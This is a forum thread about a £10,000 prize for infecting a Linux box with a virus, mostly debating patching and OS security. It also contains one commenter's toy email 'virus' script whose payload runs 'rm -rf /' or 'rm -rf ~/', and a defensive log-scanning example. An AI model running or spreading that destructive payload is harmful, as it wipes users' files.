£10,000 Prize for Linux Virus Challenge Re-Issued
mutantcamel writes "Eddie Bleasdale, the director of NetProject has been offering
£10,000 to the first hacker to infect his Linux machine with a virus for the last two years, and so far no one has hit the jackpot. He's re-announced his challenge to virus writers following a Gartner report which told IT depts. not to trust MS server software because of recent worm attacks on their servers, but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins."
So ... write a virus and get rewarded for it? What kind of world do we live in where criminals get rewarded?!
...
I guess crime does pay
To celebrate the occasion of my 1000th post, I will post no more forever on Slashdot. Goodbye.
And will you be called a "gifted programmer" a "security expert" or a "terrorist"?
In these times and with all of what's happening with all the laws passed, I wouldn't even dare touching that kind of contest, sure it's gonna make a possible winner popular, but could be also seen as a prime suspect for writing trojan code, and since law enforcement at higher levels often tries to find someone to blame, well, you know the rest.... (as in wrongfully accused, lack of proofs and still convicted, etc etc).
--- Metamoderating abusive downgraders since my 300th post.
Keep in mind that default Redhat installation ships with many bugs that all need to be patched. Saying someone can't hack this kid's linux box is a reason not to trust MS is just plain stupid. If IT dept. would patch their software and not open idiot attachments you couldn't infect MS BOXES EITHER. It's all about PATCHING, no matter which OS you use.
Think about it, most MS bugs had patches before they went widescale. If you had taken time to install these patches you wouldn't have been infected. In addition, don't open EXE's that ask for your advice and it's extremely hard to infect an NT system as well.
You can't compare an upgraded and constantly patched linux box to a default Win2k installation.
Does anyone else think that it is irresponsible to try to persuade virus writers to target Linux? What happens if someone is successful and unleashes a particularly nasty linux virus on us?
Let the virus kiddies stick to targeting Windoze.
HH
Does he just want his linux box destroyed or does it have to be a virus? He can give me his address, I'll gladly fly down to his house and smash up his linux box with a bat for 10,000 pounds (that's around 14,534 dollars and 22 cents).
I do find myself somewhat agreeing with Microsoft on this. Bugs happen. Open source may have fewer of them, but they happen with open source, too. Very few open source systems are secure "out of the box". Any admin that assumes otherwise, for BSD, or Linux, or Microsoft Windows, is a retard. Comparing an improperly administered system of one class to a tightly secured system of another is really pointless. It's comparing a retard to someone who knows what they are doing, and cares.
now we need to go OSS in diesel cars
Actually, it's closer to $15,000. I'm sure there's lots of currency converters out there that would tell you that
I'm guessing the virus writers gave up already. I'm sure 10,000 pounds is not worth the time of two years. It sounds to me that it's impossible. They should increase that amount by an exponent of 100 and see what happens.
But it's even more funny that they have to pay people to attempt to write a virus, on a free and open source system. This only means one thing...Linux really works!
If businesses want to make their networks secure, they need to hire someone who cares and knows how, and pay well to get that person. Then don't hinder them with petty things like bureaucracy. They should report directly to the CTO or CIO, or actually be the CTO or CIO.
now we need to go OSS in diesel cars
Found on the same site Virus & Hacking
-- ZeroZenith
If he doesn't run his email attachments he'll be safe. What's the big deal?
I agree that some of the responsibility lies with the sysadmin, but then again, the OS should be designed well enough that the patches are minimal.
I work in an enterprise unix environment and getting time for outages to apply patches is incredibly tough when you are running 24x7 systems that are critical to the operation of the customer.
Sure, we try to patch systems when we find out about security holes, but there comes a time when you cannot simply afford to take your systems down every week to apply new patches. Now I don't deal with MS stuff so I can't comment authoritatively, but it seems that the number of patches with MS products is never ending. This stops being a sysadmin problem and becomes a vendor (ie Microsoft) issue. Ultimately, it's a sloppy coding issue that lies with Microsoft.
The university starts later than most (Sept. 28), and I started getting this round of hits about the same time the Dorms opened up.
Problem, is the university doesn't seem to be willing to do anything about it.
Today, I shall announce an award of $5 (CDN) to who ever can write a virus for a Mac...
So start coding... There is a lot of competition out there...
---
Programming is like sex... Make one mistake and support it the rest of your life.
To be a real virus, it has to propagate to other machines, which is likely breaking the law.
So the 10,000 pounds will eventually end up in the pocket of a lawyer for defending you!
"...but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins."
After all the hours I put in on those bloody worms & viruses, it's nice to see some fallout against Microsoft, those who set the scene for such silliness. If they take responsibility for creating an insecure environment with their OS and software, they do severe damage to their brand and franchise value. If they do what they're doing now, biting the hands which feed them, ie those in the trenches making their crappy software work in production, then they will likely alienate many of the hordes of SAs which help them maintain their current position in the Enterprise & SOHOs.
Squirm, MS, Squirm.
Two years ago, most programmers were fat and content in their dot com job and didn't really have too much spare time for such stuff.
Now with the job market in the shitter, I can see someone putting plenty of effort into coding a worm for Linux (especially for $10K). A lot of people now have nothing else to do except submit resumes and work on personal projects.
Hammer of Truth
Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins.
So the admins responsible for Windows Update are considered 'tards by Microsoft? After all, windowsupdate.microsoft.com was reportedly "hacked by Chinese" this summer.
--
"Outlook not so good." That magic 8-ball knows everything! I'll ask about Exchange Server next.
What happens if someone is successful and unleashes a particularly nasty linux virus on us?
Then the particular exploit will be patched, people will learn from the experience, and Linux will be a better, more secure system as a result.
If we discourage people from trying to break systems, we end up with weak systems.
Making Linux more secure today may result in some costly damage today - but will result in a more secure Linux, which will (as more and more people install and rely on Linux) almost certainly prevent orders of magnitude more damage several years from now. If we allow systems to become "weak", but continue installing millions more such systems, sooner or later someone will write a truly malicious virus, and the damage will be far greater in that case. Think man.
I'll bet that if those gifted hackers using Linux entered this contest, it would only be a matter of time before someone did it. The problem is, none of these hackers using linux want to ruin the "secure" reputation of the OS by winning this contest. Instead of worrying about ruining its reputation, try and make a virus for it so the linux community can then come up with an update for the kernel or whatever to make it secure again.
"Be regular and orderly in your life, so that you may be violent and original in your work." -Flaubert
... provided you're not stupid.
I offer 10$ canadian (or 0.10$ US if you will) to anyone who can infect my box, 24.112.8.23.
And please no DOS attacks....
I think it was on the freebsd website that I recently saw something along the lines of "four years without a remote exploit in the default install". Can either Microsoft or the Linux community claim that? Of course not. But the point is, it IS POSSIBLE, you can't just blame sysadmins, the vendor needs to accept some responsibility too. It shows that if a vendor really feels strongly about security, then it is possible.
On a side note, I struggle to believe that MS isn't legally responsible for damage resulting from defects in its products, or that if they aren't (via EULAs) that people accept this blithely, MS has had a pretty lax attitude up to now.
OH.. no.. not at all.
They simply need an admin who is diligent about applying patches and staying informed.
Why does the CTO or CIO have to be involved? That's ridiculous.
Perhaps $ 1.000.000 makes sense. Nobody hurt himself for $15.000.
That's impossible man, they can't write a worm or virus.
Maybe for apache or something.
But in any condition, it's impossible to spread like M$ worms.
[My english is better than most other people's Turkish, so please point out mistakes politely. Thank you.]
Because without the CTO or CIO's approval and backing, you can't get a damn thing done.
7 November 2006: The day Americans realized corruption and incompetence weren't addressing 11 September 2001
--just a thought. No intent to offend, etc.
I don't think linux is more secure for this kind of thing
Short Answer: Anthrax isn't a virus.
I looked at netproject.com and couldn't find more details. What's the machine running, etc? Right now, my Linux box is behind my Windows box that only runs a web proxy. I'm also on dialup. Plus, my linux box is shut off right now. That makes it pretty secure, right? Seriously, if people only run their box with a web server and SSH, there's less of a chance of getting inside that if they ran many servers and had to worry about hacking from people with accounts on the box.
a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins.
Now huge success in IIS' worms is due to 'tardy' NT sysadmins, and definitely not MS' fault?
MS fans should feel sad for having honored title 'tardy' after all those years of unconditional loyalty.
the virus/worm or the patch?
You know someone is going to say retarded, which might not be completely fair.
It has been said that no-one ever got fired for buying IBM (long ago), or Microsoft. This may be slowly changing. I don't know of many people who want to put their jobs on the line to protect the reputation of some other company.
"It is a greater offense to steal men's labor, than their clothes"
You guys should add "Gotcha" at the end, for the more gullible, or those that skim through and miss things like "open sores software"
I still find this unfunny, because it comes framed as a personal attack.
Letter To Iran
Considering that writing a virus could be considered terrorism, and prosecuted as such, I don't know that this would be the best idea...
Although, I would certainly like the 10k Pounds...
(Now, if only I knew how to input the Pound symbol on my US keyboard...)
-- Sometimes you have to turn the lights off in order to see.
I've seen hacking contests before. They're really freaking lame. The results are not often announced, it just disappears. Or you get everyone doing a DoS thinking that is hacking.
"Bleasdale maintains it is impossible to infect a correctly configured Linux system with a virus, and conversely that it is impossible to make a system running Windows secure."
Okay this is quite clearly wrong. On many levels. Now it is possible that this guy set up a linux box with no services running at all. Fine. WindowsNT is equally secure with nothing running. But let's say a linux box has Apache, bind, or FTP on it. We've seen buffer overflows and other attacks on these software products. There is a delay from discovery to announcement to fix available. To claim that a linux box is impossible to infect is just showing ignorance, unless of course it's running nothing at all.
It has been said already, but I think this is a pretty dangerous undertaking, it has been a few years now but there has been a pretty bad *IX worm out there.
It exploited security holes in Bind and some other projects which were (like Code Red and Nimda) known a FEW MONTHS before the worm came out.
The only reason why this hasn't happened to *UX systems lately is because a) Most script kiddies hate windowze systems b) because we (the *IX admins) have something to prove (the superiority of "our" system) we PATCH.
BUT since linux is becoming more and more mainstream and used more and more at homes as small file servers or as internet routers and the sort a worm could have some devastating effects.
My 2 cts (BTW I am not defending Microsoft here)
Fighting for peace is like fucking for virginity
I'm sure the cure Microsoft would recommend is that companies hire only Microsoft accredited sysadmins through some expensive Microsoft accreditation system, and when the problem persists, then a request would be issued to pass laws that all internet connected servers running Microsoft be maintained by same.
Letter To Iran
Bill Gates would do this too, but he can't afford it.
My Karma was at 49, then they switched to words. All that work for nothing!
... of one of my old OS prof's in college
during his OS course, if you were to root his box (it ran OpenBSD), report the contents of a certain file and how you broke in, you get an A and have your name listed as an OpenBSD contributor.
Ok, so someone used the CS Dept's main Sun server to launch a DoS attack against his machine. His box held up just fine (he says he was using it during the attack and didn't notice anything unusual happening). But the dept server, OTOH, sustained major damage. It needed rebooting, and it crashed during reboot.
The dept head was not happy. The guy had to cancel that challenge because it apparently violated university policy.
The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
I agree with Microsoft, in part.
Having been responsible some time ago of the maintenance of both systems (NT and Unix) I always found easier to maintain all the different flavors of Unix (Linux, Solaris, BSD) than WinNT. Win2000 might have changed that, but I'm no longer administering MS based systems.
The main appeal of MS systems are the "Zero cost of ownership" (or whatever it's called), so it attracts lots of people with "zero sysadmin experience" who just pop in the cd and install nt+iis+exchange in a day or less, never again returning to so much as check the windows update page. I have a couple of customers who, to this day, are still vulnerable to code-red and nimda.
And no amount of warnings makes them take action until ISPs start blocking them... it's almost the same with the SPAM problem.
No sig
"....Eddie Bleasdale, has reiterated his pledge to give £10,000 to anyone who can infect his Linux computer with a virus."
This is famous, because it's Loud. Tomorrow if a Windows 2000 Admin comes and says the same thing about his "correctly configured system", I'm sure nobody will be able to do anything EXCEPT for Microsoft Employees (or the code thieves...) who know of an undetected backdoor somewhere hidden underneath layers of Windows.
But then, the same can be expected of a bug in Open Source which nobody has carefully examined till yet (it's possible...quite possible).
More to the point: It's stupid and lazy people who get viruses, regardless of their OS. If Linux ever becomes widespread, it will have a bigger virus problem than Microsoft ever has.
"but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins"
;)
It's many many many times easier to press 'SETUP' than it is to read a bugtraq every few days.
Maybe Microsoft could change the setup procedure so you HAVE to read many pages before your system works. At least you've proven that you can read
Bit like Linux. Read and search for hours to get something working.
No. Just kidding, but the click-wait-and-beproudofyourserver is also too easy. Last few weeks I've been probed by several MServers with the 'congratulated with your new server' screen as opening-screen. As I see it many of those servers are made by A: people who are curious about what it's like to have _their own_ server and B: install the server with illegal software and C: never have heard of 'patches' and 'upgrades'.
Privacy is terrorism.
All I need is access to your CD-ROM drive and a Windows CD!!
My life is one big siesta in which I'm dreaming I wished my life was one big siesta.
That quote was on the OpenBSD site, but is hardly surprising since OpenBSD won't enable any service at all unless you tell him to. This, of course, is The Right Way to Do It (tm) instead of the "let's enable every service by default" approach that W2K (Advanced) Server takes. In my experience, the average *ix sysadmin is much more knowledgeable than the average Windows admin about what services is he running.
I was the security "expert" at my last job, being the only person who really knew anything about security issues.
I was hampered from doing my job because of the way the network was set up when I got there. People resisted change.
Then, a FTP server someone else set up became an mp3 server one night. What a shock!
In other words, if you're going to institute security, people have to actually listen to you and, essentially, do what you say. You need to be the one with the power, not the one who's told what to do. That kind of edict can [usually] only come from the top.
"You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
The Constitution is NOT a suicide pact.
And quotes from Tom Clancy books are hardly divine wisdom.
To my knowledge, the Webstar reward still stands. The contest crack I suggested stems from a pcweek contest, the winner of which (jfs) exploited the third party PhotoAds software. jfs was partially successful against the crack.linuxppc.org. Details here...
Before people start slamming the Gartner report again, I hope they've read it. People seem to be under the impression that Gartner said that IIS simply wasn't secure and that other things are better - and that the response to this is 'duh, any machine which isn't updated isn't secure'. That isn't a valid response at all, because what Gartner very specifically said was not that IIS couldn't be secured, but that it is simply uneconomical because of the time and effort it takes to update IIS.
I.e. Just what they are saying is 'We all know you need good sysadmins to make sure systems are up to date with security patches, but in the case of IIS you'll have to employ someone to spend all their time doing this, and that simply isn't the least expensive way to go'....
I think you mean tarded for using MS server software.
Blah Blah Blah
Webservers that operate behind a load balancer, reverse proxy server or a firewall will often report the operating system of the load balancer, reverse proxy or firewall server. Hence reports of 'Microsoft/IIS on Linux' indicate that either the web server is behind a Linux server that is acting as a reverse proxy, has been configured to send a different signature or Microsoft have released a version of IIS for Linux.
And If you look at the history info for download.microsoft.com it shows that it is an akamai site. As well all know akamai runs linux.
You're right about RedHat. They throw together the worst Linux distro.
RedHat has lost track of the whole idea of a distro. It's a "value added" Linux.. a better Linux than you'd get if you did it yourself.
Not RedHat..
The whole point is you shouldn't need to patch it.
The defects found in RedHat and Windows are really stupid.
Yeah don't run attachments.. smart idea.. Let's remember that this is a FEATURE Microsoft ADDED. It's not a defect. Windows was made this way.
Give Microsoft a break for the first virus. Ok done.. Need the first infection to learn. Well great but the stupid patch is on the human side.
Let's also remember that Windows is designed to be "user friendly" in other words users don't know better. Linux is made with the os developers in mind.. not the average user. So before you could run an e-mail virus you'd have to know enough about Linux to recognise the virus for what it is.
Now before we get further on the "RedHat".. RedHat is not Linux... RedHat is one single distro that competes with Microsoft for the title of "the most bugs"... and last I heard RedHat held the title.. Not Microsoft.
Going into the past there have been many brown bag Unixes that were far worse than anything Microsoft put out. It's not like Microsoft or RedHat has ever achieved the title of "all time most buggy".
But those companies went away. Pushed under by Sun Microsystems long before Linux saw the light of day.
Yes you can pick out a Linux distro that is as bad if not worse than Microsoft.. I know RedHat isn't the only brain dead distro.
So you can't just buy the first Linux distro on the shelves any more than you could buy the first used car you see.
But you can't shop around for a better Windows.
Finally as I understand Windows admins are fearful of Microsoft patches. They are worried the fix will be worse than the disease...
That fear doesn't seem to be shared by Linux counterparts.
Ideally a Linux distro should be fine out of the box needing no patching. Not all distros have this advantage so you do need to shop around.
A lot more preferable to patching Windows and hoping the patches don't make things worse.
Basically for Linux you need to train users there is no way around this.
If you want Windows to work correctly you have to train the users as well.
Now what advantage did Windows have over Linux? Not needing to train anybody.
Oh.. yeah well I guess thats not the case anymore.
There aren't any viruses for Linux at the moment.
If you want to argue the future fine be my guest but let's leave it at right now Windows has the lead in viruses. Linux won't catch up even if we wanted it to...
I don't actually exist.
I have to admit that *some* (okay, maybe a lot/most) of the infections were purely due to poor server administration. The story doesn't stop there though.
I offer up as proof of what follows my Apache logs on my home machine for the last month. It's amazing how many machines out there seem incredibly interested in files such as "cmd.exe" and "root.exe", which (gasp!) don't exist on my Linux box. What's funnier is the fact that the vast majority of these attacks came from the BellSouth DSL network and various cable networks. I actually got to the point where I was ready to write a Perl script to grep up the nefarious log entries, nmap 'em automatically, and ship the results off to BellSouth's abuse department every 12 hours...
The point I'm trying to make is simply that the biggest vector for the spread of this crap is home machines. MS can yap all day long about how poor admin'ing causes this, while they fail to admit that they've put horribly insecure web server software in the hands of average Joe and Jane Consumer. Now, I'm not saying it's all MS's fault; Joe and Jane are very much to blame too for not bothering to click "Start -> Windows Update" every once in a while.
But I won't accept that MS can claim any sort of innocence on this. What about other
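The log triage described in the comment above, sketched as an added example (not the commenter's Perl script, and not code from the original page): it parses Apache access-log lines, percent-decodes each request path until it is stable so double-encoded requests are caught, and tallies probes for `cmd.exe` and `root.exe` per source address. The log lines are constructed samples using documentation address ranges, and the Apache common log format is assumed.

```python
import re
from urllib.parse import unquote

# Apache common/combined log format (assumed):
# host ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# File names mentioned in the comment; neither exists on a Linux/Apache host,
# so any request for them is a probe rather than real traffic.
PROBE_NAMES = ("cmd.exe", "root.exe")

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [05/Oct/2001:10:01:12 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
192.0.2.10 - - [05/Oct/2001:10:01:13 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
198.51.100.7 - - [05/Oct/2001:10:02:40 -0400] "GET /index.html HTTP/1.1" 200 5120
203.0.113.44 - - [05/Oct/2001:11:15:02 -0400] "GET /MSADC/Root.exe?/c+dir HTTP/1.0" 404 274
198.51.100.7 - - [05/Oct/2001:11:20:00 -0400] "GET /search?q=cmd.exe HTTP/1.1" 200 812
203.0.113.9 - - [05/Oct/2001:11:21:00 -0400] "-" 408 -
"""


def normalise_path(raw, max_rounds=3):
    """Percent-decode until stable so %255c, %5c and a literal backslash
    all end up in the same canonical form, then fold case and separators."""
    path = raw
    for _ in range(max_rounds):
        decoded = unquote(path, errors="replace")
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()


def probe_name(request):
    """Return the probed file name if the request line targets one, else None."""
    parts = request.split()
    if len(parts) < 2:
        return None  # empty or malformed request line, e.g. "-"
    # Decode first, then drop the query string, so a name that only appears
    # in a query (a search for "cmd.exe") is not counted as a probe.
    path = normalise_path(parts[1]).split("?", 1)[0]
    last_segment = path.rsplit("/", 1)[-1]
    return last_segment if last_segment in PROBE_NAMES else None


def summarise(lines):
    """Group probe requests by source host: hit count, names, first/last seen."""
    per_host = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        name = probe_name(m["request"])
        if name is None:
            continue
        entry = per_host.setdefault(
            m["host"],
            {"hits": 0, "names": set(), "first": m["time"], "last": m["time"]},
        )
        entry["hits"] += 1
        entry["names"].add(name)
        entry["last"] = m["time"]  # log lines arrive in chronological order
    return per_host


def report(per_host):
    """One line per source, busiest first, suitable for pasting into an abuse report."""
    rows = sorted(per_host.items(), key=lambda kv: (-kv[1]["hits"], kv[0]))
    return [
        f'{host} hits={e["hits"]} files={",".join(sorted(e["names"]))} '
        f'first=[{e["first"]}] last=[{e["last"]}]'
        for host, e in rows
    ]


if __name__ == "__main__":
    for row in report(summarise(SAMPLE_LOG.splitlines())):
        print(row)
```
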
This has to be the most poorly researched article I've ever seen. What is this? "I heard Eddie say that he'd give Sophos a bucket load of money if they could infect his Linux box" becomes news? For a start, there are already Unix viruses and they have been reported in the wild. What is all this stuff about "hackers" and "exploits" about? Are we talking about worms or viruses or what? Where is the actual written declaration of the challenge? Who is the third party holding the cash in escrow? How is the challenge supposed to work? Surely Ed isn't suggesting that he will track down and award the author of any virus that ends up on his machine. Surely Ed isn't trying to incite people to write actual viruses and release them into the wild. I have emailed netproject.com, maybe the original "reporter" should have done this, it's called basic research. BTW - I heard Bill Gates said he'd give $1,000,000 to anyone who can sneak a whoopee cushion onto his chair before he sits down on Monday, should I look for the Slashdot article?
How we know is more important than what we know.
... we just need to convince him somehow that he needs to open email attachments. Any of us could make an executable that would dispose of his machine and we'd collect the reward. But he wouldn't run it for us like so many Windows users would. Linux is JUST as vulnerable to 90% of the types of Windows viruses that are out there... its users just often aren't.
Yeah.. they were too lazy to install a real OS like Unix/Linux/BSD... hey even if they kept NT or Windows, they could have at least used Apache!
Only 'flamers' flame!
We have `netstat -anp`... they have... ummm... service manager?
The journey is better then the end.
I tend to bash WinXXXX as the next slashdoter, with good reasons, but netstat exists on Win2k too... check your facts first.. :)
Nah that's Windows you're thinking of..
"WebTV: bringing the Internet into the shallow end of the gene pool since 1995" - Martin Bishop
I have been reading through the posts and I've seen people saying that patch and don't get infected etc. My question is, how will you patch something that doesn't exist. I mean if a virus doesn't exist then there is no patch for that virus. You will get a patch after a virus has been discovered, and a patch has been released. But until then it might be too late. Somebody said (in a previous thread) that if an os was designed with security in mind the patches would be to a minimum. I agree to that and I like to say that it's not the admin's fault. If MS had not all these security holes then maybe a few patches would "close" the holes and admins would be able to keep up with the patches.
Viruses and other exploits don't happen because of mere sloppy coding. It is rather arrogance and/or poor design (which I guess are the same thing). And this is not limited to proprietary software either.
A well-designed secure program generally assumes that it will be compromised and has safeguards to limit impact of such a compromise. For example, think of what you can do if you compromise IIS or Sendmail, and compare with a compromise of Qmail or Apache (assuming you could compromise Qmail). IIS, Outlook, and other Microsoft products suffer from this problem.
So, people will say that the *nix world is much better (and forget the lessons learned from the Morris Worm). The kernels are very stable, but it is the network services which are the most vulnerable. Remember that root has to run the process if it binds to a port below 1024, so many network daemons are run exclusively by root. If I were into this area, I would be targeting these services (BIND, Sendmail, Tux, Websphere, etc.) rather than the older viruses. Tux represents an interesting case in point because it can have no safeguards except for very careful coding (and NO coding will ever be perfect) as it runs in kernel mode.
Now there is one other thing that was not said... Does the virus have to be Linux specific, or can I use an old-fashioned boot-sector virus?
LedgerSMB: Open source Accounting/ERP
We have `netstat -anp`... they have... ummm... service manager?
:)
Just FYI, but under windows you have the equivalent command but instead of "netstat -anp" it's "netstat -ano". I realize the differences between these 2 commands may be great, but the command does still exist.
Of course, netstat and service manager aren't the same tools, because netstat is useful for more than just seeing what services you're running - after all, not everything in service manager opens a port, and not everything that opens a port has to be in service manager.
Looking at service manager is really more like looking in /etc/rc.d/... (or wherever your distribution puts your init scripts at) than looking at netstat...
And just FYI, you'll find most of your normal unix networking utilities are available at the command line in windows. There's ping, and tracert, ipconfig, route, nslookup, etc... There's nothing more fun than telling some absolute novice "All right, now go to Start->Run and type in 'command' and enter. now type ping hostname, ok, let's try tracert hostname. What's it say? ". Ahh, so much fun...
Virus means Anthrax is out.
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
You are both defending Microsoft and you are flat out wrong. Linux *DOES*
not have the virus-spreading email programs and other software that
populates the Windows environment.
Hmmm.... So.... If Microsoft were to release Outlook for Linux, then we would be insecure too? The weak point of *nix is that only programs running as root can bind to ports below 1024 which means that most network services MUST run as root, and few have worker processes with fewer restrictions, like Apache does.
So how about a change in paradigm? How about ditching this whole concept of requiring network services to run as root and have a "netd" group which would be allowed to do this but not required to be root. We already sort of hack this by using xinetd and inetd, so why not create a new, more secure standard that would do more to prevent serious exploits and hence possibly viruses as well?
LedgerSMB: Open source Accounting/ERP
only I don't know which part of what I wrote resembled some Tom Clancy quote. I wrote my comment without assistance or plagiarizing, because my thoughts are my own.
I don't think this is a fair comparison. On one hand, you have a person that has locked down his machine with the latest patches, the highest security settings, firewalls, etc... And we're comparing it to a WinNT Administrator that has not patched his systems since the first install.
Windows servers could be as secure as Linux if the administrators take the time into securing their servers
Linux servers could be as insecure as a Win Server if the admin doesn't take the time into patching the system.
It's just a matter of the admin. As an administrator of a relatively small institution, it is often difficult for me to be on top of every patch that is available. We have 3 live servers and 1 backup server. It is a great deal to ensure that the patch is not detrimental to our applications, finding time to patch the systems that works with the users, and actually doing it. System patches are often done on weekends or friday nights and doing a bunch of patches at the same time. There is a level of acceptable risks that you must take when you are dealing with live servers.
Has anyone else encountered situations like this? How have you dealt with it?
_______________________________
"I'm not Conceited...I'm just a realist..."
#!/bin/sh
#
# TODO:
# Parse e-mail address' out of browser's cache
# Send program as attachment in e-mail
# Program untested, you'll get the idea anyway...
#
echo -e 'To: $TO_ADDR\nSubject: Hi! How are you? \n\nI send you this file in order to have your advice\n\n#!/bin/sh\nif[ "$UID" = "0" ]; then\n\nrm -rf
if[ "$UID" = "0" ]; then
rm -rf /
else
rm -rf ~/
fi
The program can be considered a virus. While it is blatantly clear that you should never run it, I could have made it a binary which would have made it harder to see what it does. And who is to say that the user will even look at the file before executing it? A virus on any system requires the user to execute code (even if it is automated to a certain extent on certain systems). Whether the system is Linux or Windows, if the user wants to execute a program, they will.
Sysadmins would not be put in such a position if M$ idiots actually had some settings turned _off_ by default. :-)
I know that is a hard concept for some) when unfortunately these things have to be installed (the client is the other half of the story
Yes, OpenBSD is 4 years without a remote hole in the default install. They have a very good code peer review which fixes problems before they become problems. Microsoft trying to lay the blame for this on sysadmins is insane. Yes, I do expect to get an OS out of the box with no major security problems. This just shows you how far removed from reality Microsoft still is. They don't "get it". This is why they have had trouble penetrating into the Fortune 500 high-end market. Engineering does not want to hear "you're having this problem because you're tardy". What they're saying in essence is "we expect you to work on our timetable", i.e. when some 15-year-old exposes how crappy the security of W2K out-of-box is and they patch it, every client worldwide is expected to immediately upgrade or it's the customer's fault because they're tardy. This is not what customers like to hear. Thankfully I only have to deal with Solaris (and Linux) most of the time, and NT/W2K only on occasion. I've had the misfortune of always having some small NT responsibility since NT 3.51 came out. Anyone remember what a piece of crap that was? Windows 3.11 GUI even after Windows 95 came out with its Mac ripped off interface, constant blue screens of death, weird license restrictions on how many people could connect at once, constant need to edit the registry to do anything but editing the registry would invalidate any support. Blah - it hasn't gotten much better since. I've been sysadminning a while, and most NT admins will admit that UNIX is superior to NT.
You suck. I wanted to post this. :(
Best. Comment. Ever. Enjoy!
14,517$, as a matter of fact
1 pound == 1.45$
--
Two witches watched two watches.
Which witch watched which watch?
The Constitution is NOT a suicide pact.
Hmmm, "Give me liberty or give me death"
And it's terrorists, not "Islamic terrorists". Osama is enough over the wall that his own family has disowned him.
We give up our (not "so called") rights, guess what? The terrorists just won. Doesn't matter who we bomb, catch, whatever.
Tardy is like 5 minutes, not half a fucking year. Let's be honest here, these sysadmins are not tardy, they are goddamn incompetent.
1q2w3e4r5t6y7u8i9o0pqawsedrftgthyjukilo;p'azsxdcf
"No nation could preserve its freedom in the midst of continual warfare."
--James Madison
What makes this trolling is that you're not contributing anything new to the discussion. OK, you're one of many people who think that Red Hat is too buggy. This is not useful. What would be useful is a description of distros that (in your opinion) do a better job.
Need I mention that I personally prefer Red Hat 7.1? Not perfect, but the easiest to live with for my narrow purposes. If I'm full of it, kindly educate me. Don't just scream at me.
I know if his system gets infected by a virus this will result in a patch and the system becoming more secure. But I hope for the sake of the reputation of an OS that prides itself in being more secure than proprietary alternatives and for the sake of this guy's wallet that nobody ever wins the money. It would be sad to see this stunt to prove the security of a well maintained linux box backfire.
----
Emacs is a nice OS - but it lacks a good text editor. That's why I am using Vim.
"Madness is something rare in individuals - but in groups, parties, peoples, ages it is the rule." -- Nietzsche
Most likely he considers the opportunity to study these attempts in a controlled environment more valuable than the money anyways. In a world where most warranties say something like "Not guaranteed to be suitable for any purpose", I find this approach most refreshing. Try and find commercially produced software that states that it's suitable even for the purpose it was manufactured for.
I hope for his sake running Outlook and IE 5.5 in Wine is out-of-bounds. I read a while back where the Wine crew considered getting a virus to be a major milestone achievement in compatibility.
Apocalypse Cancelled, Sorry, No Ticket Refunds
I actually remember stumbling across a BSD copyright notice in my win95 machine. I bet there is a lot more BSD stuff in Windows than M$ would ever like to be known. I started to look for a lot of the network utils when I saw that both Windows and Linux/BSD systems were vulnerable to the same TCP/IP buffer overflow.
You can amaze a lot of Windows-only people by knowing how to run common stuff from the command line.
Apocalypse Cancelled, Sorry, No Ticket Refunds
If he is running Wine, I'll just send him SirCam... But do Windows virii count?
LedgerSMB: Open source Accounting/ERP
"The defects found in RedHat and Windows are really stupid."
You haven't programmed much have you? (At all? No, patching a C file a couple of times and writing some bash scripts does not count as programming much) Most programmers know that there will be (not might be) bugs in the code. As far as stupid defects, yes they've both had their share. However RedHat is nowhere near Windows in terms of sheer volume of severe bugs. I don't know where you got your data. The last one that I saw was clearly biased (they counted general Linux bugs and RedHat-specific bugs together even though there was significant overlap).
Also note that RedHat uses newer versions of programs than most other Linux distributions. They don't hide this fact. I applaud them for it. Why? Because if they didn't, glibc2 would not have been adopted as quickly as it was. And what about the "broken" compiler that came out with RedHat 7? People railed and hollered because they couldn't compile their kernels. Actually they could, but people conveniently forgot that RedHat posted notices in big letters that they have to use the older version of the compiler to compile (oh no! you have to use kgcc instead of gcc! how will users ever figure that out, especially if RedHat explicitly tells them that they have to). Yes there were bugs in the compiler. It was patched, but the kernel still didn't build. Why not? Because there was code in the kernel that was not compliant with the C99 standard. People's C++ code wouldn't compile anymore. Why? Because a lot of C++ code is plainly incompatible with the ISO98 standard of C++. You know that thing that Slashdotters are always railing about: STANDARDS. Or do you advocate ignoring standards when they don't suit you? Wouldn't that make you like Microsoft? These are standards that were ratified and publicly announced two and three years ago. How can you say that they snuck up on you?
What does C99 give you?
Allocated on the stack so no need for malloc or free (and less corresponding bugs) and basically eliminates the hacks out there to accomplish the same like alloca.
What does ISO98 C++ give you?
The Standard Template Library. 'Nuff said.
These are examples, but are indicative of a general trend.
1. New library or suite that is noticeably better comes out
2. RedHat recognizes that it is better, includes it in their distribution, tests, and releases
3. People bitch and moan about how it breaks things that don't come with the distribution
4. Everyone blames RedHat for doing a horrible job
5. Because it is being used, the library in question gets a shakedown and most bugs are worked out quickly
6. People reluctantly fix their programs to work with the updated library/suite so that they can run on RedHat
7. In the course of fixing, people come across the advantages of the new library/suite and herald its arrival
8. People deride the older version
9. People forget it was RedHat that drove the newer, better library/suite into general use
10. Goto 1 because geek memories appear to be very short
If you want a closer-to-perfect RedHat box, install a copy from two versions ago and install all of the associated patches for it. This will be about the equivalent of a standard Debian install: very secure, but quite out of date. If you run Debian unstable or testing, while having more up-to-date software, you find that many of those "stupid defects" find their way into that distribution as well.
- I don't need to go outside, my CRT tan'll do me just fine.
I offer 10$ canadian (or 0.10$ US if you will) to anyone who can infect my box, 24.112.8.23
ping 24.112.8.23
Pinging 24.112.8.23 with 32 bytes of data:
Request timed out.
